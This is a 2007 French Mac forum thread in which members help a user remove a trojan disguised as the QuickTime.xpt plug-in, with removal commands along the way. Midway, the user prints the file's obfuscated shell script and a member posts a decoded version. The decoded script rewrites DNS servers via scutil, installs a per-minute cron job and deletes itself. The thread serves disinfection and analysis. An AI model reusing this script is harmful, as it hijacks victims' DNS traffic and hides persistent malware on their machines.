![]() |
Bienvenue invité ( Connexion | Inscription )
![]() ![]() |
![]() |
![]()
|
|
Macbidouilleur de vermeil ! ![]() ![]() ![]() ![]() Groupe : Membres Messages : 955 Inscrit : 17 May 2006 Membre no 61 358 ![]() |
Comme l'a si bien dit chombier :
Dans ce cas, il faut supprimer le fichier /Library/Internet Plug-Ins/QuickTime.xpt puis taper dans le terminal: CODE sudo crontab -r Enfin il faut redémarrer, et tout devrait rentrer dans l'ordre. Ce message a été modifié par Lumbermatt - 11 Dec 2007, 13:41. |
|
|
![]()
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 6 581 Inscrit : 20 Mar 2003 Membre no 6 765 ![]() |
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:34) [snapback]2475260[/snapback] J'suis vraiment couillon ![]() imac-de-frederic-maechand:~ fredm$ sudo crontab -l * * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1 imac-de-frederic-maechand:~ fredm$ Au vu du résulat j'suis mal ![]() Intéressant ! Ce n'est pas le fichier habituel qui devrait s'appeler plugins.settings, mais une variante, QuickTime.xpt. Peux tu mettre ce fichier QuickTime.xpt en pièce jointe ici ? ![]() -------------------- késtananafout' (:
|
|
|
![]()
|
|
Macbidouilleur de vermeil ! ![]() ![]() ![]() ![]() Groupe : Membres Messages : 955 Inscrit : 17 May 2006 Membre no 61 358 ![]() |
CITATION(chombier @ 11 Dec 2007, 13:40) [snapback]2475272[/snapback] Intéressant ! Ce n'est pas le fichier habituel qui devrait s'appeler plugins.settings, mais une variante, QuickTime.xpt. Peux tu mettre ce fichier QuickTime.xpt en pièce jointe ici ? ![]() Ou simplement tapper : CODE cat /Library/Internet Plug-Ins/QuickTime.xpt et nous coller la sortie Ce message a été modifié par Lumbermatt - 11 Dec 2007, 13:43. |
|
|
![]()
|
|
![]() Adepte de Macbidouille ![]() Groupe : Membres Messages : 84 Inscrit : 1 Jul 2007 Lieu : 12 KM de RENNES Membre no 89 736 ![]() |
J'ai tout fait comme tu as dit et sa marche.
Si tu pouvais voir mon beau sourire. Le cheval de Troie est viré????? Je peux répondre aux mails et me connecter au forum dont je parlais. -------------------- |
|
|
![]()
|
|
Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 571 Inscrit : 21 Sep 2004 Lieu : Nancy Membre no 23 949 ![]() |
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:34) [snapback]2475260[/snapback] J'suis vraiment couillon ![]() imac-de-frederic-maechand:~ fredm$ sudo crontab -l * * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1 imac-de-frederic-maechand:~ fredm$ Au vu du résulat j'suis mal ![]() Cela peut être une variante (ie. ce n'est en tout cas pas l'original). Donc pour commencer, je proposerais : CODE sudo crontab -r cd sudo mv "/Library/Internet Plug-Ins/QuickTime.xpt" . Puis noter les anciens numéros dns si ils existent, redémarrer, redéfinir la connexion (voir http://wap.macplus.net/magplus/depeche-158...er-osx-rsplug-a ). Pour note: pour le moment, le fichier QuickTime.xpt sera déplacé dans la maison, ie. il ne faudra pas recliquer dessus. |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:43) [snapback]2475276[/snapback] J'ai tout fait comme tu as dit et sa marche. Si tu pouvais voir mon beau sourire. Le cheval de Troie est viré????? Je peux répondre aux mails et me connecter au forum dont je parlais. Tu as quoi dans les IP des DNS ? |
|
|
![]()
|
|
![]() Adepte de Macbidouille ![]() Groupe : Membres Messages : 84 Inscrit : 1 Jul 2007 Lieu : 12 KM de RENNES Membre no 89 736 ![]() |
Merci pour ton autre solution osnola, mais la première a fonctionné.
Petite question: j'ai 2 poubelles dans MAIL, l'une s'appelle: sur mon mac l'autre: compte orange (je l'ai nommé du mon de mon fournisseur) Pourquoi 2 poubelles? Lumbermatt, je crois que c'est bon car j'ai: 192.168.1.1 0.0.0.0 Ce message a été modifié par FRED LA FERRAILLE - 11 Dec 2007, 13:52. -------------------- |
|
|
![]()
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 6 581 Inscrit : 20 Mar 2003 Membre no 6 765 ![]() |
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:43) [snapback]2475276[/snapback] J'ai tout fait comme tu as dit et sa marche. Si tu pouvais voir mon beau sourire. Le cheval de Troie est viré????? Je peux répondre aux mails et me connecter au forum dont je parlais. Il est viré... pour l'instant, mais on ne sait pas par quel moyen tu l'as installé, donc tu n'es pas à l'abri de te le reprendre. Si jamais tu n'as pas vidé la corbeille et que le fichier QuickTime.xpt est toujours présent, pourrais-tu le poster ici pour que l'on puisse l'examiner ? Il est peut-être plus nocif que l'original... -------------------- késtananafout' (:
|
|
|
![]()
|
|
![]() Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 8 888 Inscrit : 27 Nov 2004 Membre no 27 732 ![]() |
Comment tu fais ? ...
![]() ![]() Plus serieusement : réfléchis quand l'ordinateur te demande de taper ton mot de passe admin , c'est qu'il y a un risque... -------------------- MATOS:Mac Mini Core I7 / Samsung Note 8 / Acer E3 FAI : Bouygues ......Tablets :Tablet User
|
|
|
![]()
|
|
Concernant Quick Time, j'ai ce résultat:
imac-de-frederic-maechand:~ fredm$ cat /Library/Internet Plug-Ins/QuickTime.xpt cat: /Library/Internet: No such file or directory cat: Plug-Ins/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ -------------------- |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:56) [snapback]2475295[/snapback] Concernant Quick Time, j'ai ce résultat: imac-de-frederic-maechand:~ fredm$ cat /Library/Internet Plug-Ins/QuickTime.xpt cat: /Library/Internet: No such file or directory cat: Plug-Ins/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ Et avec cette commande ? CODE cat ~/.Trash/QuickTime.xpt PS: Tu peux copier/coller pour ne pas te planter. Ce message a été modifié par chombier - 11 Dec 2007, 14:00. -------------------- késtananafout' (:
|
|
|
![]()
|
|
Copier/coller...quelle belle invention
![]() Voici le résultat: imac-de-frederic-maechand:~ fredm$ cat ~/.Trash/QuickTime.xpt cat: /Users/fredm/.Trash/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ -------------------- |
|
|
![]()
|
|
Macbidouilleur d'Or ! ![]() ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 571 Inscrit : 21 Sep 2004 Lieu : Nancy Membre no 23 949 ![]() |
Si tu n'as pas déjà vidé la corbeille, tu peux essayer de cliquer sur la corbeille dans le dock et puis de le mettre dans ton home par exemple (pour qu'il soit à nouveau accessible en lecture).
Edit: j'avais mal lu. Ce message a été modifié par osnola - 11 Dec 2007, 14:03. |
|
|
![]()
|
|
J'ai du louper une étape, à aucun moment je n'ai mis QuickTime.xpt dans la corbeille
![]() Je fais quoi maintenant??? Ce message a été modifié par FRED LA FERRAILLE - 11 Dec 2007, 14:08. -------------------- |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 14:04) [snapback]2475306[/snapback] J'ai du louper une étape, à aucun moment je n'ai mis QuickTime.exe dans la corbeille ![]() Tu n'as pas appliqué la procédure donnée par Lumbermatt : "Dans ce cas, il faut supprimer le fichier /Library/Internet Plug-Ins/QuickTime.xpt " ? Normalement dans ce cas, il doit enlever le fichier du répertoire "/Library/Internet Plug-Ins" et le placer dans la corbeille (pour qu'il puisse être récupérer en cas de fausse manipulation). Pour note aussi, si Time Machine est activé, il est aussi possible de s'en servir pour retrouver ce fichier... Ce message a été modifié par osnola - 11 Dec 2007, 14:09. |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 14:04) [snapback]2475306[/snapback] J'ai du louper une étape, à aucun moment je n'ai mis QuickTime.exe dans la corbeille ![]() Euh... tu pourrais nous rappeler ce que tu as fait ? Tu n'as pas retiré un fichier QuickTime.xpt du dossier "/Bibliothèque/Internet Plug-Ins" ? -------------------- késtananafout' (:
|
|
|
![]()
|
|
Non, je ne l'ai pas fait, c'est grave?
Si je le fais maintenant c'est re-grave? -------------------- |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 13:56) [snapback]2475295[/snapback] Concernant Quick Time, j'ai ce résultat: imac-de-frederic-maechand:~ fredm$ cat /Library/Internet Plug-Ins/QuickTime.xpt cat: /Library/Internet: No such file or directory cat: Plug-Ins/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ Ok, j'avais loupé celle-là. Il y a un espace entre Internet et Plug-Ins, qu'il faut "échapper" pour le terminal. Donc le fichier est toujours là, tant mieux, on va pouvoir avoir son contenu ![]() Alors, peux tu essayer ça: CODE cat "/Library/Internet Plug-Ins/QuickTime.xpt"
-------------------- késtananafout' (:
|
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 14:13) [snapback]2475324[/snapback] Non, je ne l'ai pas fait, c'est grave? Si je le fais maintenant c'est re-grave? Avant de le faire, fais-en une copie pour qu'on puisse regarder ce qu'il y a dedans. Après, il faudra l'enlever (pour le moment, il doit être dormant). Si il n'a pas remis les anciennes adresses DNS et la crontab, l'enlever suffira. Sinon, il faudra réenlever la crontab et redémarrer... |
|
|
![]()
|
|
Voila le contenu:
Last login: Tue Dec 11 13:38:46 on console imac-de-frederic-maechand:~ fredm$ cat / cat: /: Is a directory imac-de-frederic-maechand:~ fredm$ cat /Library/Internet Plug-Ins/QuickTime.xpt cat: /Library/Internet: No such file or directory cat: Plug-Ins/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ cat ~/.Trash/QuickTime.xpt cat: /Users/fredm/.Trash/QuickTime.xpt: No such file or directory imac-de-frederic-maechand:~ fredm$ cat "/Library/Internet Plug-Ins/QuickTime.xpt" #!/bin/sh x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aae.ze;s2=cx.zxx.aaz.cr;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit; #!/bpf/oy daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo" PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF ndkf tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4 q.oynw uvpx EOF ) /voj/obpf/olvxpi << EOF ndkf q.pfpx q.aqq SkjskjAqqjkooko * $1 $2 okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS uvpx EOF kepox=`ljnfxab -i|tjkd QvplgTphk.edx` pr [ "$kepox" == "" ]; xykf klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox ljnfxab ljnf.pfox jh -jr ljnf.pfox rp jh -jr "$0" imac-de-frederic-maechand:~ fredm$ -------------------- |
|
|
![]()
|
|
Ah ben voilà, c'est tout de suite plus clair !
![]() Plus sérieusement, décodé, ça donne: CODE #!/bin/sh
path="/Library/Internet Plug-Ins" PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF open get State:/Network/Global/IPv4 d.show quit EOF ) /usr/sbin/scutil << EOF open d.init d.add ServerAddresses * $1 $2 set State:/Network/Service/$PSID/DNS quit EOF exist=`crontab -l|grep QuickTime.xpt` if [ "$exist" == "" ]; then echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst crontab cron.inst rm -rf cron.inst fi rm -rf "$0" Ce message a été modifié par chombier - 11 Dec 2007, 14:30. -------------------- késtananafout' (:
|
|
|
![]()
|
|
Tu lis dans mes pensées
![]() -------------------- |
|
|
![]()
|
|
![]() Macbidouilleur de vermeil ! ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 155 Inscrit : 14 Sep 2007 Lieu : Grenoble,Москва, Сaнкт Пeтербург Membre no 94 795 ![]() |
Par contre pourrais-tu nous dire ou es tu allé piocher ça ?
![]() -------------------- Passer pour un idiot aux yeux d'un imbécile est une volupté de fin gourmet.
|
|
|
![]()
|
|
Simplement dans terminal en collant: cat "/Library/Internet Plug-Ins/QuickTime.xpt"
-------------------- |
|
|
![]()
|
|
![]() Macbidouilleur de vermeil ! ![]() ![]() ![]() ![]() Groupe : Membres Messages : 1 155 Inscrit : 14 Sep 2007 Lieu : Grenoble,Москва, Сaнкт Пeтербург Membre no 94 795 ![]() |
Non ,le troyan
![]() ce serrai pas en cherchant une petite Ukrainienne ? ![]() -------------------- Passer pour un idiot aux yeux d'un imbécile est une volupté de fin gourmet.
|
|
|
![]()
|
|
Je n'avais pas compris l'inclinaison de ta remarque
![]() -------------------- |
|
|
![]()
|
|
CITATION(FRED LA FERRAILLE @ 11 Dec 2007, 14:26) [snapback]2475345[/snapback] Simplement dans terminal en collant: cat "/Library/Internet Plug-Ins/QuickTime.xpt" La question est plutôt quel site internet es-tu allé visiter, qui t'aurait demandé d'installer un plugin bidon pour voir une image ou une vidéo, et qui s'est révélé être cette saloperie de cheval de troie. -------------------- késtananafout' (:
|
|
|
![]()
|
|
Donc visiblement, si j'ai tout compris, ce cheval de troie a le comportement classique, il ne fait que modifier les adresses DNS et il se rajoute dans la crontab. Donc pour l'éradiquer, il suffit de faire ce qu'on a dit, l'effacer, enlever la crontab, redémarrer et remettre les adresses DNS.
Ce message a été modifié par osnola - 11 Dec 2007, 14:35. |
|
|
![]()
|
|
CITATION(osnola @ 11 Dec 2007, 14:34) [snapback]2475352[/snapback] Donc visiblement, si j'ai tout compris, ce cheval de troie a le comportement classique, il ne fait que modifier les adresses DNS et il se rajoute dans la crontab. Exact. J'ai mis le script décodé plus haut. -------------------- késtananafout' (:
|
|
|
![]()
|
|
Je n'en sais rien, je vais sur beaucoup de forums étrangers dédiés à la coutellerie.
Certains donne accès à des sites de couteliers puis à des liens etc Qu'est ce que je dois faire maintenant; car malgré le "décriptage" du résultat de terminal, j'entrevoie pas grand chose!!! -------------------- |
|
|
![]() ![]() |
Nous sommes le : 18th July 2025 - 11:53 |